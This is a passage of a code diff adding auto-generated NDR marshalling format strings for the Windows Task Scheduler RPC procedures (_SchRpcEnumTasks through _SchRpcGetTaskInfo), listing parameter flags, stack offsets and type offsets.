+/* 396 */	NdrFcShort( 0x158 ),	/* Flags:  in, out, base type, simple ref, */
+/* 398 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 400 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 402 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 404 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 406 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 408 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 410 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 412 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 414 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 416 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 418 */	NdrFcShort( 0x64 ),	/* Type Offset=100 */
+
+	/* Parameter arg_6 */
+
+/* 420 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 422 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 424 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcEnumTasks */
+
+
+	/* Return value */
+
+/* 426 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 428 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 432 */	NdrFcShort( 0x7 ),	/* 7 */
+/* 434 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 436 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 438 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 440 */	NdrFcShort( 0x2c ),	/* 44 */
+/* 442 */	NdrFcShort( 0x40 ),	/* 64 */
+/* 444 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x7,		/* 7 */
+/* 446 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 448 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 450 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 452 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 454 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 456 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 458 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 460 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 462 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 464 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 466 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 468 */	NdrFcShort( 0x158 ),	/* Flags:  in, out, base type, simple ref, */
+/* 470 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 472 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 474 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 476 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 478 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 480 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 482 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 484 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 486 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 488 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 490 */	NdrFcShort( 0x64 ),	/* Type Offset=100 */
+
+	/* Parameter arg_6 */
+
+/* 492 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 494 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 496 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcEnumInstances */
+
+
+	/* Return value */
+
+/* 498 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 500 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 504 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 506 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 508 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 510 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 512 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 514 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 516 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x5,		/* 5 */
+/* 518 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 520 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 522 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 524 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 526 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 528 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 530 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 532 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_1 */
+
+/* 534 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 536 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 538 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 540 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 542 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 544 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 546 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 548 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 550 */	NdrFcShort( 0x82 ),	/* Type Offset=130 */
+
+	/* Parameter arg_4 */
+
+/* 552 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 554 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 556 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetInstanceInfo */
+
+
+	/* Return value */
+
+/* 558 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 560 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 564 */	NdrFcShort( 0x9 ),	/* 9 */
+/* 566 */	NdrFcShort( 0x50 ),	/* X64 Stack size/offset = 80 */
+/* 568 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 570 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 572 */	NdrFcShort( 0x44 ),	/* 68 */
+/* 574 */	NdrFcShort( 0x5c ),	/* 92 */
+/* 576 */	0x45,		/* Oi2 Flags:  srv must size, has return, has ext, */
+			0x9,		/* 9 */
+/* 578 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 580 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 582 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 584 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 586 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 588 */	NdrFcShort( 0x10a ),	/* Flags:  must free, in, simple ref, */
+/* 590 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 592 */	NdrFcShort( 0x90 ),	/* Type Offset=144 */
+
+	/* Parameter arg_1 */
+
+/* 594 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 596 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 598 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_2 */
+
+/* 600 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 602 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 604 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 606 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 608 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 610 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_4 */
+
+/* 612 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 614 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 616 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_5 */
+
+/* 618 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 620 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 622 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_6 */
+
+/* 624 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 626 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 628 */	NdrFcShort( 0xb6 ),	/* Type Offset=182 */
+
+	/* Parameter arg_7 */
+
+/* 630 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 632 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 634 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_8 */
+
+/* 636 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 638 */	NdrFcShort( 0x48 ),	/* X64 Stack size/offset = 72 */
+/* 640 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcStopInstance */
+
+
+	/* Return value */
+
+/* 642 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 644 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 648 */	NdrFcShort( 0xa ),	/* 10 */
+/* 650 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 652 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 654 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 656 */	NdrFcShort( 0x4c ),	/* 76 */
+/* 658 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 660 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 662 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 664 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 666 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 668 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 670 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 672 */	NdrFcShort( 0x10a ),	/* Flags:  must free, in, simple ref, */
+/* 674 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 676 */	NdrFcShort( 0x90 ),	/* Type Offset=144 */
+
+	/* Parameter arg_1 */
+
+/* 678 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 680 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 682 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 684 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 686 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 688 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcStop */
+
+
+	/* Return value */
+
+/* 690 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 692 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 696 */	NdrFcShort( 0xb ),	/* 11 */
+/* 698 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 700 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 702 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 704 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 706 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 708 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x3,		/* 3 */
+/* 710 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 712 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 714 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 716 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 718 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 720 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 722 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 724 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_1 */
+
+/* 726 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 728 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 730 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 732 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 734 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 736 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcRun */
+
+
+	/* Return value */
+
+/* 738 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 740 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 744 */	NdrFcShort( 0xc ),	/* 12 */
+/* 746 */	NdrFcShort( 0x48 ),	/* X64 Stack size/offset = 72 */
+/* 748 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 750 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 752 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 754 */	NdrFcShort( 0x4c ),	/* 76 */
+/* 756 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x8,		/* 8 */
+/* 758 */	0xa,		/* 10 */
+			0x5,		/* Ext Flags:  new corr desc, srv corr check, */
+/* 760 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 762 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 764 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 766 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 768 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 770 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 772 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 774 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 776 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 778 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 780 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 782 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 784 */	NdrFcShort( 0xd4 ),	/* Type Offset=212 */
+
+	/* Parameter arg_3 */
+
+/* 786 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 788 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 790 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 792 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 794 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 796 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 798 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 800 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 802 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_6 */
+
+/* 804 */	NdrFcShort( 0x4112 ),	/* Flags:  must free, out, simple ref, srv alloc size=16 */
+/* 806 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 808 */	NdrFcShort( 0x90 ),	/* Type Offset=144 */
+
+	/* Parameter arg_7 */
+
+/* 810 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 812 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 814 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcDelete */
+
+
+	/* Return value */
+
+/* 816 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 818 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 822 */	NdrFcShort( 0xd ),	/* 13 */
+/* 824 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 826 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 828 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 830 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 832 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 834 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x3,		/* 3 */
+/* 836 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 838 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 840 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 842 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 844 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 846 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 848 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 850 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 852 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 854 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 856 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 858 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 860 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 862 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcRename */
+
+
+	/* Return value */
+
+/* 864 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 866 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 870 */	NdrFcShort( 0xe ),	/* 14 */
+/* 872 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 874 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 876 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 878 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 880 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 882 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 884 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 886 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 888 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 890 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 892 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 894 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 896 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 898 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 900 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 902 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 904 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_2 */
+
+/* 906 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 908 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 910 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 912 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 914 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 916 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcScheduledRuntimes */
+
+
+	/* Return value */
+
+/* 918 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 920 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 924 */	NdrFcShort( 0xf ),	/* 15 */
+/* 926 */	NdrFcShort( 0x48 ),	/* X64 Stack size/offset = 72 */
+/* 928 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 930 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 932 */	NdrFcShort( 0x78 ),	/* 120 */
+/* 934 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 936 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x8,		/* 8 */
+/* 938 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 940 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 942 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 944 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 946 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 948 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 950 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 952 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 954 */	NdrFcShort( 0xa ),	/* Flags:  must free, in, */
+/* 956 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 958 */	NdrFcShort( 0xf2 ),	/* Type Offset=242 */
+
+	/* Parameter arg_2 */
+
+/* 960 */	NdrFcShort( 0xa ),	/* Flags:  must free, in, */
+/* 962 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 964 */	NdrFcShort( 0xf2 ),	/* Type Offset=242 */
+
+	/* Parameter arg_3 */
+
+/* 966 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 968 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 970 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 972 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 974 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 976 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 978 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 980 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 982 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_6 */
+
+/* 984 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 986 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 988 */	NdrFcShort( 0x104 ),	/* Type Offset=260 */
+
+	/* Parameter arg_7 */
+
+/* 990 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 992 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 994 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetLastRunInfo */
+
+
+	/* Return value */
+
+/* 996 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 998 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1002 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 1004 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 1006 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1008 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1010 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1012 */	NdrFcShort( 0x58 ),	/* 88 */
+/* 1014 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 1016 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1018 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1020 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1022 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1024 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1026 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 1028 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1030 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 1032 */	NdrFcShort( 0x4112 ),	/* Flags:  must free, out, simple ref, srv alloc size=16 */
+/* 1034 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1036 */	NdrFcShort( 0xf6 ),	/* Type Offset=246 */
+
+	/* Parameter arg_2 */
+
+/* 1038 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1040 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1042 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 1044 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1046 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1048 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetTaskInfo */
+
+
+	/* Return value */
+
+/* 1050 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 1052 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1056 */	NdrFcShort( 0x11 ),	/* 17 */
+/* 1058 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 1060 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1062 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1064 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 1066 */	NdrFcShort( 0x40 ),	/* 64 */
+/* 1068 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x5,		/* 5 */
+/* 1070 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1072 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1074 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1076 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1078 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1080 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 1082 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1084 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 1086 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 1088 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1090 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 1092 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1094 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1096 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
